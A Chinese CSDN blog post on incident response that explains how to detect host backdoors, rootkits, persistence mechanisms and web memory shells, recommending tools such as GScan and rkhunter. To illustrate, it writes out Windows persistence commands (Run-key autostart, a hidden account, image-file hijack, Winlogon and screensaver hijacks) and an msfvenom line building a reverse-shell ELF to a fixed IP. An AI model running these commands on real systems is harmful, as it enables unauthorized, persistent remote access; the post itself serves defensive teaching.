2、应急响应-后门入侵检测&Rookit&权限维持后门&内存马

最新推荐文章于 2024-05-08 07:15:13 发布
最新推荐文章于 2024-05-08 07:15:13 发布
阅读量492 收藏 8
点赞数 14
分类专栏: 应急响应-蓝队 文章标签: 网络安全 系统安全 web安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65842464/article/details/135768753
版权

前言:

后门类型:

(1)、主机系统常规后门,例如:MSF远控木马,CS免杀后门

(2)、权限维持后门,例如:linux系统的Rookit后门

(3)、Web程序后门及内存马

应急响应工具包合集

Windows的Rookit开源工具:https://github.com/JKornev/hidden

Rootkit:是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。Rootkit通过加载特殊的驱动,修改系统内核,进而达到隐藏信息的目的。

1、主机免杀后门检测方法

做过免杀的后门,可能普通查杀工具(火绒,360)扫描不出来,可通过工具(火绒剑,PCHunter)进行网络分析,重点关注外连了外网IP的未知文件,这是后门的特征

2、权限维持后门检测

Windows权限维持比如自启动、映像劫持,在火绒剑、PCHunter里也有对应的栏目,也可逐一排查,Linux权限维持后门则可用到GScan和rkhunter工具检测

1、Windows系统
自启动测试:
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run " /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"
隐藏账户:
net user xiaodi$ xiaodi!@#X123 /add
映像劫持:修改注册表指向,当执行notepad时运行计算器
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"
屏保&登录后自动运行后门
reg add "HKEY CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe"

2、Linux系统
常规后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf
对于常规MSF后门,其一般会有网络外连的情况,可使用命令:netstat -anpt  针对网络外连的进行逐一排查,kill+进程号,关闭后门
Rootkit后门使用工具:GScan rkhunter  EDR,青藤
权限维持后门使用工具:GScan rkhunter
1、GScan
https://github.com/grayddq/GScan
python GScan.py
2、rkhunter
wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz
tar -xvf rkhunter-1.4.6.tar.gz 
cd rkhunter-1.4.6 
./installer.sh --layout default --install
rkhunter -c

3、Web程序后门及内存马检测

常规Web后门可以用阿里伏魔在线查杀或者河马客户端扫描

Java内存马实现方式

内存马检测查杀:

 1、应急响应-网站入侵检测&访问日志&漏洞排查&Webshell内存马查杀-CSDN博客

++⁠⁠
关注
  • 14
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Hacker Defender ROOKIT检测工具源码
02-25
Hacker Defender ROOKIT检测工具源码
ROOKIT后门工具
06-21
网络技术后门工具。检测,比较好的工具。欢迎使用
Hacker_Defender_ROOKIT.rar_hacker_木_木 扫描_木扫描
09-22
检测工具,针对端口扫描等一些比较典型的攻击行为,代码比较简单,适合初学者
应急响应-Linux入侵排查(工具篇)
lza20001103的博客
05-07 2422
Linux入侵排查(工具篇)
权限维持与隐蔽通道技术:原理探索与实战解析
Kali与编程
05-02
综上所述,深入研究权限维持与隐蔽通道技术,不仅可以帮助我们更好地理解现代网络攻击的复杂性,更能指导我们制定和完善相应的防御措施,提升整体的信息安全保障能力。在网络安全领域,权限维持与隐蔽通道技术是两种高级且颇具挑战性的攻击手段,对于理解和防御复杂的信息安全威胁至关重要。凭证窃取与滥用:攻击者盗取合法用户的凭据信息,如密码、密钥或证书,在需要时使用这些凭证重新登录系统,达到权限维持的目的。隔离关键环境:通过网络隔离、物理隔离等手段,限制未经授权的内外部通信,降低隐蔽通道的风险。一、权限维持原理与方法。
内网渗透之Linux权限维持-Rootkit后门&Strace监控&Alias别名&Cron定时任务
m0_62207170的博客
05-21 990
内网渗透之Linux权限维持-Rootkit后门&Strace监控&Alias别名&Cron定时任务
痛苦网安学习之RootKit
w2864619870的博客
11-01 1198
老师期末不知道留什么,我这么努力做笔记,应该可以及格。可是最近开始掉头发了,我明明都不努力的,就怕掉头发,没想到还是会这样,我不能接受。
Linux 权限维持手法
qq_53742230的博客
07-21 1913
Linux 权限维持手法
Linux权限维持
小丁长不胖
07-22 236
一:适配方法 1:后门账户 可疑用户排查: 2:SUID Shell Suid shell是一种可用于以拥有者权限运行的shell。 可疑排查: 3:公私钥免密登录 在客户端上生成一对公私钥,然后把公钥放到服务器上(~/.ssh/authorized_keys),保留私钥。当ssh登录时,ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。 客户端与服务端执行: ssh-keygen -t rsa #过程中按三次回车 其中 id_rsa为私钥,id_rsa.pub为公钥,接
Linux权限维持后门
yy
04-18 3597
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木后门等其他恶意程序结合使用。 rootkit是linux平台下最常见的一种木后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的
内核级后门Rootkit技术
01-25
内核级后门Rootkit技术 内核级后门Rootkit技术
OpenArk:OpenArk是Windows的开源反rookit(ARK)工具-Open source
03-25
OpenArk是Windows的一个开源反rookit(ARK)工具。 Ark是Anti-Rootkit的缩写,它旨在反转/编程帮助程序,用户也可以在OS中找出隐藏的恶意软件。 将来将支持越来越强大的功能。 特征 进程-进程/线程/模块/句柄/内存/...
服务器病毒木通用排查处理应急响应流程
it知识分享 free for nothing..
03-18 1199
服务器病毒木通用排查处理应急响应流程
初探rootkit(另一种角度看维权)
milu_Sec的博客
12-30 889
rootkit是用于后渗透过程中维持住现有权限的工具,比如现在常用的 linux 维持权限的方法大多用 crontab 和开机自启动,同时使用的大多是msf 或者其它的 tcp 连接来反弹 shell ,这些随便应急排查一下自启动项和网络连接就被发现了,那如果我们在内核层面把进程和tcp隐藏岂不是就不是那么显眼了.于是rootkit成了很好的选择。install.exe是把r77注入到所有能注入的进程和启动系统rootkit的,所以安装完可以把程序删了,实现无文件启动。
163、应急响应——后门攻击检测指南&Rootkit&内存&权限维持
qq_55202378的博客
03-25 817
后门查杀主要查杀:web后门ServletFilterListenerphp内存,先杀进程,再删后门就行了。主机后门权限维持后门
应急响应-后门攻击检测指南&Rookit&内存&权限维持&WIN&Linux
siu~
04-08 349
后门攻击检测指南&Rookit&内存&权限维持&WIN&Linux
Linux后渗透--权限维持十式(附检测及清除手段)
weixin_44155363的博客
06-15 1974
0x01:SSH 一、ssh软连接 SSH软连接后门的原理 1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su) 3、如果被控主机不允许root登陆可用其他已存在用户登陆 4、通过软连接的方式,实质上PAM认证是通过软连接的文件名(如:/tmp/su,/home/su)在/etc/pam.d/目录下寻找对应的PAM配置文件(如:/etc/pam.d/su) 5、任意密码登
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8204
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
沙盘Sandboxie v5.56.4
最新发布
爱酷码的博客
05-08 64
菜鸟高手裸奔工具沙盘Sandboxie是一款国外著名的系统安全工具,它可以让选定程序在安全的隔离环境下运行,只要在此环境中运行的软件,浏览器或注册表信息等都可以完整的进行清空,不留一点痕迹。带有木或者病毒的恶意网站,对于经常测试软件或者不放心的软件,可放心在沙盘里面运行!官方论坛于2020年3月份免费公布 Sandboxie 源码。安装完成后,在菜单Options->第一个下拉选择简体中文,现在由开发者 @DavidXanatos 个人接手源码维护。官方数字签名的最后一个免费版本的版本号为v5.36。
网安术语:一句话、小、大webshell、提权、后门rookit、源码打包、脱裤、暴库、嗅探、社工、poc、exp、cve分别都是什么意思
05-31
2. 小:一种常见的WebShell,指的是以一段代码的形式将恶意代码植入网站服务器,从而实现对服务器的控制。 3. 大:一种常见的WebShell,指的是以多行代码的形式将恶意代码植入网站服务器,从而实现对服务器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

++⁠⁠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值